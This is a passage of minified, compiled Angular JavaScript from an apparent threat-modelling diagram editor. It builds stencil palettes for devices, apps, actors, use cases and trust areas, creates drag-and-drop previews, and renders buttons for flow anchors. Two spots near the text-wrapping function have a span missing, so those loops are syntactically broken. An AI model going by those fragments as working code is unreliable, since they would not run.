jlt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),s(1,"\n "),m(2,"div",16),s(3),u(),s(4,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetContextRefToolTip(e)),g(2),ri("border-color",i.theme.Primary),g(1),ke(e.name)}}function Qlt(t,a){if(1&t){const e=Ye();m(0,"div",31),he("dragstart",function(n){const c=be(e).$implicit;return Me(V(2).onDragContext(n,c))})("dragend",function(){return be(e),Me(V(2).onDragEnd())}),s(1,"\n "),fi(),m(2,"svg",8),s(3,"\n "),it(4,"circle",23),s(5,"\n "),it(6,"path",24),s(7,"\n "),m(8,"text",10),s(9,"\n "),m(10,"tspan",25),s(11),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);at("matTooltip",i.GetContextRefToolTip(e)),g(4),ri("stroke",i.theme.Primary),g(2),ri("stroke",i.theme.Primary),g(4),ri("fill",i.StrokeColor),g(1),ke(e.name)}}function $lt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-expansion-panel",2),s(3,"\n "),m(4,"mat-expansion-panel-header"),s(5,"\n "),m(6,"mat-panel-title"),s(7,"\n Device\n "),u(),s(8,"\n "),m(9,"mat-panel-description"),s(10,"\n "),m(11,"mat-icon"),s(12,"check_box_outline_blank"),u(),s(13,"\n "),u(),s(14,"\n "),u(),s(15,"\n \n "),m(16,"div",3),s(17,"\n "),ne(18,Glt,5,4,"div",28),s(19,"\n "),u(),s(20,"\n "),u(),s(21,"\n\n "),m(22,"mat-expansion-panel",2),s(23,"\n "),m(24,"mat-expansion-panel-header"),s(25,"\n "),m(26,"mat-panel-title"),s(27,"\n App\n "),u(),s(28,"\n "),m(29,"mat-panel-description"),s(30,"\n "),m(31,"mat-icon"),s(32,"check_box_outline_blank"),u(),s(33,"\n "),u(),s(34,"\n "),u(),s(35,"\n \n "),m(36,"div",3),s(37,"\n "),ne(38,jlt,5,4,"div",28),s(39,"\n "),u(),s(40,"\n "),u(),s(41,"\n\n "),m(42,"mat-expansion-panel",2),s(43,"\n "),m(44,"mat-expansion-panel-header"),s(45,"\n "),m(46,"mat-panel-title"),s(47,"\n Actor\n "),u(),s(48,"\n "),m(49,"mat-panel-description"),s(50,"\n "),m(51,"mat-icon"),s(52,"people"),u(),s(53,"\n "),u(),s(54,"\n "),u(),s(55,"\n \n "),m(56,"div",3),s(57,"\n "),ne(58,Qlt,15,8,"div",28),s(59,"\n "),u(),s(60,"\n "),u(),s(61,"\n\n "),m(62,"mat-expansion-panel",2),s(63,"\n "),m(64,"mat-expansion-panel-header"),s(65,"\n "),m(66,"mat-panel-title"),s(67,"\n Use Case\n "),u(),s(68,"\n "),m(69,"mat-panel-description"),s(70,"\n "),m(71,"mat-icon"),s(72,"radio_button_unchecked"),u(),s(73,"\n "),u(),s(74,"\n "),u(),s(75,"\n \n "),m(76,"div",3),s(77,"\n "),m(78,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"Use Case"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),s(79,"\n "),fi(),m(80,"svg",8),s(81,"\n "),it(82,"ellipse",29),s(83,"\n "),m(84,"text",10),s(85,"\n "),m(86,"tspan",30),s(87,"Use Case"),u(),s(88,"\n "),u(),s(89,"\n "),u(),s(90,"\n "),u(),s(91,"\n "),u(),s(92,"\n "),u(),s(93,"\n\n "),ln(),m(94,"mat-expansion-panel",2),s(95,"\n "),m(96,"mat-expansion-panel-header"),s(97,"\n "),m(98,"mat-panel-title"),s(99,"\n Trust Area\n "),u(),s(100,"\n "),m(101,"mat-panel-description"),s(102,"\n "),m(103,"mat-icon"),s(104,"select_all"),u(),s(105,"\n "),u(),s(106,"\n "),u(),s(107,"\n\n "),m(108,"div",3),s(109,"\n "),m(110,"div",20),he("dragstart",function(n){return be(e),Me(V().onDragContext(n,{name:"Trust Area"}))})("dragend",function(){return be(e),Me(V().onDragEnd())}),m(111,"div",17),s(112,"Trust Area"),u()(),s(113,"\n "),u(),s(114,"\n "),u(),s(115,"\n "),Mt()}if(2&t){const e=V();g(18),F("ngForOf",e.DeviceStencils),g(20),F("ngForOf",e.AppStencils),g(20),F("ngForOf",e.InteractorStencils),g(24),ri("stroke",e.StrokeColor),g(4),ri("fill",e.StrokeColor),g(25),ri("border-color",e.StrokeColor)}}let Klt=(()=>{class t{constructor(e,i,n){this.dataService=e,this.theme=i,this.translate=n,this.stencilBuffer={},this.StrokeColor="black",this.wrapBuffer={},this.initalizeStencils(),this.dataService.Project.DFDElementsChanged.subscribe(r=>{r.Type==Ja.Removed&&this.initalizeStencils()}),this.dataService.Project.DevicesChanged.subscribe(r=>{this.initalizeStencils()}),this.dataService.Project.MobileAppsChanged.subscribe(r=>{this.initalizeStencils()})}get ProcessStencils(){return this.stencilBuffer.P[this.NodeType]}get DataStoreStencils(){return this.stencilBuffer.DS[this.NodeType]}get ExternalEntityStencils(){return this.stencilBuffer.EE[this.NodeType]}get DataFlowStencils(){return this.stencilBuffer.DF[this.NodeType]}get TrustAreaStencils(){return this.stencilBuffer.TA[this.NodeType]}get PhysicalLinkStencils(){return this.stencilBuffer.PL[this.NodeType]}get InterfaceStencils(){return this.stencilBuffer.IF[this.NodeType]}get StencilTemplates(){return this.stencilBuffer.ST[this.NodeType]}get DeviceStencils(){return this.stencilBuffer.DEV[this.NodeType]}get AppStencils(){return this.stencilBuffer.APP[this.NodeType]}get InteractorStencils(){return this.stencilBuffer.ACT[this.NodeType]}get ComponentTypes(){let e=[];const i=this.selectedNode.data;return this.dataService.Config.GetMyComponentTypes(this.NodeType==aa.Software?zr.Software:zr.Process).filter(r=>!i.GetChildren().map(c=>c.Type).includes(r)).forEach(r=>e.push(r)),e}get NodeType(){var e;return null===(e=this.selectedNode)||void 0===e?void 0:e.dataType}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e,this.initalizeStencils()}ngOnInit(){this.setColors(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(e=>{this.setColors(e)})}initalizeStencils(){if([aa.Software,aa.Process].includes(this.NodeType))return;const e=(r,c,d,T,k)=>{if(this.stencilBuffer[r][c]=[],d.sort(),d.forEach(q=>{this.dataService.Config.GetStencilTypes().filter(Y=>Y.IsDefault&&Y.ElementTypeID==q).forEach(Y=>this.stencilBuffer[r][c].push({stencilID:Y.ID,name:Y.Name}))}),T&&T.forEach(q=>this.stencilBuffer[r][c].push(...this.addDFDElementReferences(q))),k){const q=this.dataService.Config.GetStencilTypes().find(Y=>Y.IsDefault&&Y.ElementTypeID==d[0]);k.forEach(Y=>this.stencilBuffer[r][c].push(...this.addContextElementReferences(Y).map(te=>({name:te.name,stencilID:q.ID}))))}d.forEach(q=>{this.dataService.Config.GetStencilTypes().filter(Y=>!Y.IsDefault&&Y.ElementTypeID==q).forEach(Y=>this.stencilBuffer[r][c].push({stencilID:Y.ID,name:Y.Name}))}),d.forEach(q=>{this.dataService.Config.GetStencilTypeTemplates().filter(te=>(c==aa.Hardware&&te.ListInHWDiagram||c==aa.Dataflow&&te.ListInUCDiagram)&&te.StencilTypes.length>0&&te.ListInElementTypeIDs.includes(q)).forEach(te=>this.stencilBuffer[r][c].push({templateID:te.ID,name:te.Name}))})};let i="P";this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyProcessing]),e(i,aa.Dataflow,[Et.LogProcessing],null,[Aa.MobileApp]),i="DS",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyDataStore]),e(i,aa.Dataflow,[Et.LogDataStore]),i="EE",this.stencilBuffer[i]={},e(i,aa.Dataflow,[Et.LogExternalEntity,Et.PhyExternalEntity],[Et.LogExternalEntity,Et.PhyExternalEntity]),i="DF",this.stencilBuffer[i]={},e(i,aa.Dataflow,[Et.DataFlow]),i="TA",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhyTrustArea]),e(i,aa.Dataflow,[Et.LogTrustArea,Et.PhyTrustArea],[Et.PhyTrustArea],[Aa.MobileApp]),i="PL",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.PhysicalLink]),e(i,aa.Dataflow,[Et.PhysicalLink],[Et.PhysicalLink]),i="IF",this.stencilBuffer[i]={},e(i,aa.Hardware,[Et.Interface]),this.stencilBuffer[i][aa.Dataflow]=[];const n=this.dataService.Config.GetStencilTypes().filter(r=>r.ElementTypeID==Et.Interface&&null!=r.TemplateDFD);this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInUCDiagram&&r.StencilTypes.length>0&&n.some(c=>c.TemplateDFD==r)).forEach(r=>this.stencilBuffer[i][aa.Dataflow].push({templateID:r.ID,name:r.Name})),i="ST",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.Hardware]=[],this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInHWDiagram&&r.StencilTypes.length>0).forEach(r=>this.stencilBuffer[i][aa.Hardware].push({templateID:r.ID,name:r.Name})),this.stencilBuffer[i][aa.Dataflow]=[],this.dataService.Config.GetStencilTypeTemplates().filter(r=>r.ListInUCDiagram&&r.StencilTypes.length>0).forEach(r=>this.stencilBuffer[i][aa.Dataflow].push({templateID:r.ID,name:r.Name})),i="DEV",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.Device),i="APP",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.MobileApp),i="ACT",this.stencilBuffer[i]={},this.stencilBuffer[i][aa.UseCase]=this.addContextElementReferences(Aa.Interactor)}addContextElementReferences(e){let i=[];return this.dataService.Project.GetContextElements().filter(n=>{var r,c,d;return!(n instanceof Ts||n instanceof Bg)&&n.Type==e&&(null===(r=this.dataService.Project.FindDiagramOfElement(n.ID))||void 0===r?void 0:r.ID)!=(null===(d=null===(c=this.selectedNode)||void 0===c?void 0:c.data)||void 0===d?void 0:d.ID)}).forEach(n=>{i.push({elementID:n.ID,elementType:e,name:n.Name})}),i}addDFDElementReferences(e){let i=[];return this.dataService.Project.GetDFDElements().filter(n=>{var r,c,d,T;return!(n instanceof td||n instanceof zm)&&(null===(r=n.GetProperty("Type"))||void 0===r?void 0:r.ElementTypeID)==e&&(null===(c=this.dataService.Project.FindDiagramOfElement(n.ID))||void 0===c?void 0:c.ID)!=(null===(T=null===(d=this.selectedNode)||void 0===d?void 0:d.data)||void 0===T?void 0:T.ID)}).forEach(n=>{i.push({elementID:n.ID,name:n.Name})}),i}onDrag(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({stencilRef:i}));var r=document.createElement("div");r.textContent=i.name;let c=null;i.stencilID?c=this.dataService.Config.GetStencilType(i.stencilID):i.elementID?c=this.dataService.Project.GetDFDElement(i.elementID).GetProperty("Type"):i.templateID&&r.classList.add("trust-area"),c&&(c.ElementTypeID==Et.LogProcessing||c.ElementTypeID==Et.PhyProcessing?(r.classList.add("process"),r.style.borderStyle="solid",r.style.borderRadius="10px"):c.ElementTypeID==Et.LogDataStore||c.ElementTypeID==Et.PhyDataStore?(r.style.borderTopStyle="solid",r.style.borderBottomStyle="solid"):c.ElementTypeID==Et.LogExternalEntity||c.ElementTypeID==Et.PhyExternalEntity?r.style.borderStyle="solid":c.ElementTypeID==Et.LogTrustArea||c.ElementTypeID==Et.PhyTrustArea?r.style.borderStyle="dashed":c.ElementTypeID==Et.PhysicalLink?r.classList.add("physical-link"):c.ElementTypeID==Et.Interface?r.classList.add("interface"):console.error("ElementTypeID not implemented",c.ElementTypeID)),r.style.width="140px",r.style.height="75px",this.theme.IsDarkMode&&(r.style.backgroundColor="#424242"),r.style.borderColor=this.theme.IsDarkMode?"white":"black",r.style.textAlign="center",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(r),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left="-145px",this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragContext(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({contextRef:i}));let r="200px",c="200px",d="-205px";i.elementType==Aa.Device&&(r="250px",c="350px",d="-255px"),i.elementType==Aa.MobileApp?(r="250px",c="350px",d="-255px"):"Interactor"==i.name||i.elementType==Aa.Interactor?(r="40px",c="50px",d="-45px"):i.name.startsWith("Interface")?(r="25px",c="25px",d="-25px"):"Use Case"==i.name?(r="140px",c="50px",d="-145px"):"External Entity"==i.name?(r="140px",c="75px",d="-145px"):"Trust Area"==i.name&&(r="300px",c="300px",d="-305px");var T=document.createElement("div");T.textContent=i.name.replace(/[0-9]/g,""),T.style.borderStyle="solid",T.style.width=r,T.style.height=c,this.theme.IsDarkMode&&(T.style.backgroundColor="#424242"),T.style.borderColor=this.theme.IsDarkMode?"white":"black",T.style.textAlign="center",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(T),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left=d,this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragComponent(e,i){e.dataTransfer.setData("dragDropData",JSON.stringify({componentTypeID:null==i?void 0:i.ID}));var r=document.createElement("div");r.textContent="Component",r.classList.add("process","element-base","element-large"),r.style.width="140px",r.style.height="75px",this.theme.IsDarkMode&&(r.style.backgroundColor="#424242"),r.style.borderColor=this.theme.IsDarkMode?"white":"black",r.style.borderStyle="solid",r.style.textAlign="center",r.style.borderRadius="10px",this.dragDiv=document.createElement("div"),this.dragDiv.appendChild(r),this.dragDiv.style.position="absolute",this.dragDiv.style.top="0px",this.dragDiv.style.left="-145px",this.dragDiv.style.borderStyle="none",this.dragDiv.style.backgroundColor="#424242",document.querySelector("body").appendChild(this.dragDiv),e.dataTransfer.setDragImage(this.dragDiv,0,0)}onDragEnd(){document.querySelector("body").removeChild(this.dragDiv)}GetStencilRefToolTip(e){let i=e.name.replace(/\n/g," ");return e.elementID?i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.blueColor"):e.templateID&&(i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.purpleColor")),i}GetContextRefToolTip(e){let i=e.name.replace(/\n/g," ");return e.elementID&&(i+="\n\n"+this.translate.instant("pages.modeling.stencilpalette.blueColor")),i}WrapSVGText(e,i){if(null==e)return[];if(this.wrapBuffer[e])return this.wrapBuffer[e][i];let n=e.replace(/\n/g," ").split(" ");for(let c=0;c0&&(n.splice(c+1,0,n[c].substring(d+1)),n[c]=n[c].substring(0,d+1))}for(let c=0;c{class t{constructor(e){this.select=e,this.spacekeydown=new Tt,this.select._handleKeydown=i=>{if(" "==i.key){const n=this.select.panelOpen&&this.select.options.filter(r=>r.active)[0]||null;this.spacekeydown.emit(n?n.value:null)}else this.select.disabled||(this.select.panelOpen?this.select._handleOpenKeydown(i):this.select._handleClosedKeydown(i))}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Nr,2))},t.\u0275dir=Ot({type:t,selectors:[["","no-space",""]],outputs:{spacekeydown:"spacekeydown"}}),t})();function Xlt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ke(re(2,2,i.GetArrowPositionName(e)))}}function Ylt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),s(1,"\n "),ne(2,Xlt,3,4,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);Ct("disable",!e.Editable),F("ngModel",i.GetValue(e)),g(2),F("ngForOf",i.GetArrowPositions())}}function Jlt(t,a){if(1&t){const e=Ye();m(0,"button",22),he("click",function(){return be(e),Me(V(3).AssignNumberToAsset())}),s(1),oe(2,"translate"),u()}2&t&&(g(1),ke(re(2,1,"properties.AssignNumber")))}function Zlt(t,a){if(1&t){const e=Ye();m(0,"mat-checkbox",23),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.checked))}),u()}if(2&t){const e=V().$implicit;F("checked",V(2).GetValue(e))("disabled",!e.Editable)}}function edt(t,a){if(1&t&&(m(0,"option",21),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,e))}}function tdt(t,a){if(1&t){const e=Ye();m(0,"select",19),he("change",function(n){be(e);const r=V().$implicit;return Me(V(2).SetValue(r,n.target.value))}),s(1,"\n "),ne(2,edt,3,4,"option",20),s(3,"\n "),u()}if(2&t){const e=V().$implicit,i=V(2);Ct("disable",!e.Editable),F("ngModel",i.GetValue(e)),g(2),F("ngForOf",i.GetDeviceInterfaceNames())}}function idt(t,a){1&t&&(fi(),it(0,"circle",36)),2&t&&Rt("fill",V(4).GetIconColor())}function adt(t,a){1&t&&(fi(),it(0,"circle",37)),2&t&&Rt("fill",V(4).GetIconColor())}function ndt(t,a){1&t&&(fi(),it(0,"circle",38)),2&t&&Rt("fill",V(4).GetIconColor())}function odt(t,a){1&t&&(fi(),it(0,"circle",39)),2&t&&Rt("fill",V(4).GetIconColor())}function rdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.NorthWest}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function sdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.NorthEast}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function cdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.SouthWest}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function ldt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.SouthEast}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function ddt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.NorthWest}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function mdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.NorthEast}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function udt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.SouthWest}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function hdt(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){be(e);const n=V(5);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.SouthEast}))}),s(1,"\n "),fi(),m(2,"svg",45),s(3,"\n "),it(4,"circle",46),s(5,"\n "),it(6,"line",47),s(7,"\n "),it(8,"line",48),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(5);g(6),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0))}}function fdt(t,a){if(1&t){const e=Ye();fi(),s(0,"\n "),ln(),m(1,"div",40),s(2,"\n "),m(3,"div",41),s(4,"\n "),m(5,"table"),s(6,"\n "),m(7,"tr"),s(8,"\n "),m(9,"td"),s(10,"\n "),ne(11,rdt,11,2,"button",42),s(12,"\n "),u(),s(13,"\n "),m(14,"td",43),s(15,"\n "),m(16,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.North}))}),s(17,"\n "),fi(),m(18,"svg",45),s(19,"\n "),it(20,"circle",46),s(21,"\n "),it(22,"line",47),s(23,"\n "),it(24,"line",48),s(25,"\n "),u(),s(26,"\n "),u(),s(27,"\n "),u(),s(28,"\n "),ln(),m(29,"td"),s(30,"\n "),ne(31,sdt,11,2,"button",42),s(32,"\n "),u(),s(33,"\n "),u(),s(34,"\n "),m(35,"tr"),s(36,"\n "),m(37,"td"),s(38,"\n "),m(39,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.West}))}),s(40,"\n "),fi(),m(41,"svg",45),s(42,"\n "),it(43,"circle",46),s(44,"\n "),it(45,"line",47),s(46,"\n "),it(47,"line",48),s(48,"\n "),u(),s(49,"\n "),u(),s(50,"\n "),u(),s(51,"\n "),ln(),m(52,"td",49),s(53),oe(54,"translate"),u(),s(55,"\n "),m(56,"td"),s(57,"\n "),m(58,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.East}))}),s(59,"\n "),fi(),m(60,"svg",45),s(61,"\n "),it(62,"circle",46),s(63,"\n "),it(64,"line",47),s(65,"\n "),it(66,"line",48),s(67,"\n "),u(),s(68,"\n "),u(),s(69,"\n "),u(),s(70,"\n "),u(),s(71,"\n "),ln(),m(72,"tr"),s(73,"\n "),m(74,"td"),s(75,"\n "),ne(76,cdt,11,2,"button",42),s(77,"\n "),u(),s(78,"\n "),m(79,"td",43),s(80,"\n "),m(81,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"1",fa:n.AnchorDirections.South}))}),s(82,"\n "),fi(),m(83,"svg",45),s(84,"\n "),it(85,"circle",46),s(86,"\n "),it(87,"line",47),s(88,"\n "),it(89,"line",48),s(90,"\n "),u(),s(91,"\n "),u(),s(92,"\n "),u(),s(93,"\n "),ln(),m(94,"td"),s(95,"\n "),ne(96,ldt,11,2,"button",42),s(97,"\n "),u(),s(98,"\n "),u(),s(99,"\n "),u(),s(100,"\n "),u(),s(101,"\n "),m(102,"div",50),s(103,"\n "),m(104,"table"),s(105,"\n "),m(106,"tr"),s(107,"\n "),m(108,"td"),s(109,"\n "),ne(110,ddt,11,2,"button",42),s(111,"\n "),u(),s(112,"\n "),m(113,"td",43),s(114,"\n "),m(115,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.North}))}),s(116,"\n "),fi(),m(117,"svg",45),s(118,"\n "),it(119,"circle",46),s(120,"\n "),it(121,"line",47),s(122,"\n "),it(123,"line",48),s(124,"\n "),u(),s(125,"\n "),u(),s(126,"\n "),u(),s(127,"\n "),ln(),m(128,"td"),s(129,"\n "),ne(130,mdt,11,2,"button",42),s(131,"\n "),u(),s(132,"\n "),u(),s(133,"\n "),m(134,"tr"),s(135,"\n "),m(136,"td"),s(137,"\n "),m(138,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.West}))}),s(139,"\n "),fi(),m(140,"svg",45),s(141,"\n "),it(142,"circle",46),s(143,"\n "),it(144,"line",47),s(145,"\n "),it(146,"line",48),s(147,"\n "),u(),s(148,"\n "),u(),s(149,"\n "),u(),s(150,"\n "),ln(),m(151,"td",49),s(152),oe(153,"translate"),u(),s(154,"\n "),m(155,"td"),s(156,"\n "),m(157,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.East}))}),s(158,"\n "),fi(),m(159,"svg",45),s(160,"\n "),it(161,"circle",46),s(162,"\n "),it(163,"line",47),s(164,"\n "),it(165,"line",48),s(166,"\n "),u(),s(167,"\n "),u(),s(168,"\n "),u(),s(169,"\n "),u(),s(170,"\n "),ln(),m(171,"tr"),s(172,"\n "),m(173,"td"),s(174,"\n "),ne(175,udt,11,2,"button",42),s(176,"\n "),u(),s(177,"\n "),m(178,"td",43),s(179,"\n "),m(180,"button",44),he("click",function(){be(e);const n=V(4);return Me(n.selectedFlow.AnchorChanged.emit({o:"2",fa:n.AnchorDirections.South}))}),s(181,"\n "),fi(),m(182,"svg",45),s(183,"\n "),it(184,"circle",46),s(185,"\n "),it(186,"line",47),s(187,"\n "),it(188,"line",48),s(189,"\n "),u(),s(190,"\n "),u(),s(191,"\n "),u(),s(192,"\n "),ln(),m(193,"td"),s(194,"\n "),ne(195,hdt,11,2,"button",42),s(196,"\n "),u(),s(197,"\n "),u(),s(198,"\n "),u(),s(199,"\n "),u(),s(200,"\n "),m(201,"button",51),he("click",function(){return be(e),Me(V(4).flowMenuIsOpen=!1)}),oe(202,"translate"),s(203,"\n "),fi(),m(204,"svg",52),s(205,"\n "),it(206,"circle",53),s(207,"\n "),it(208,"line",54),s(209,"\n "),it(210,"line",55),s(211,"\n "),u(),s(212,"\n "),u(),s(213,"\n "),u(),s(214,"\n ")}if(2&t){const e=V(4);g(1),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),g(2),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),g(8),F("ngIf",8==e.AnchorCount),g(11),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(7),F("ngIf",8==e.AnchorCount),g(14),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(6),ct("\n ",re(54,43,"properties.Sender"),"\n "),g(11),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(10),F("ngIf",8==e.AnchorCount),g(11),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(7),F("ngIf",8==e.AnchorCount),g(6),Ct("flowAnchorOverlay-dark",e.theme.IsDarkMode)("flowAnchorOverlay-light",!e.theme.IsDarkMode),g(8),F("ngIf",8==e.AnchorCount),g(11),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(7),F("ngIf",8==e.AnchorCount),g(14),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(6),ct("\n ",re(153,45,"properties.Receiver"),"\n "),g(11),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(10),F("ngIf",8==e.AnchorCount),g(11),Rt("stroke",e.GetIconColor(!0)),g(2),Rt("stroke",e.GetIconColor(!0)),g(7),F("ngIf",8==e.AnchorCount),g(6),at("matTooltip",re(202,47,"general.Close")),g(5),Rt("stroke",e.theme.IsDarkMode?"white":"black")("fill",e.theme.IsDarkMode?"#333333":"#e7e5e5"),g(2),Rt("stroke",e.theme.IsDarkMode?"white":"black"),g(2),Rt("stroke",e.theme.IsDarkMode?"white":"black")}}function pdt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"button",24,25),he("click",function(){return be(e),Me(V(3).flowMenuIsOpen=!0)}),oe(4,"translate"),s(5,"\n "),fi(),m(6,"svg",26),s(7,"\n "),ne(8,idt,1,1,"circle",27),s(9,"\n "),ne(10,adt,1,1,"circle",28),s(11,"\n "),ne(12,ndt,1,1,"circle",29),s(13,"\n "),ne(14,odt,1,1,"circle",30),s(15,"\n \n "),it(16,"circle",31),s(17,"\n "),it(18,"circle",32),s(19,"\n "),it(20,"circle",33),s(21,"\n 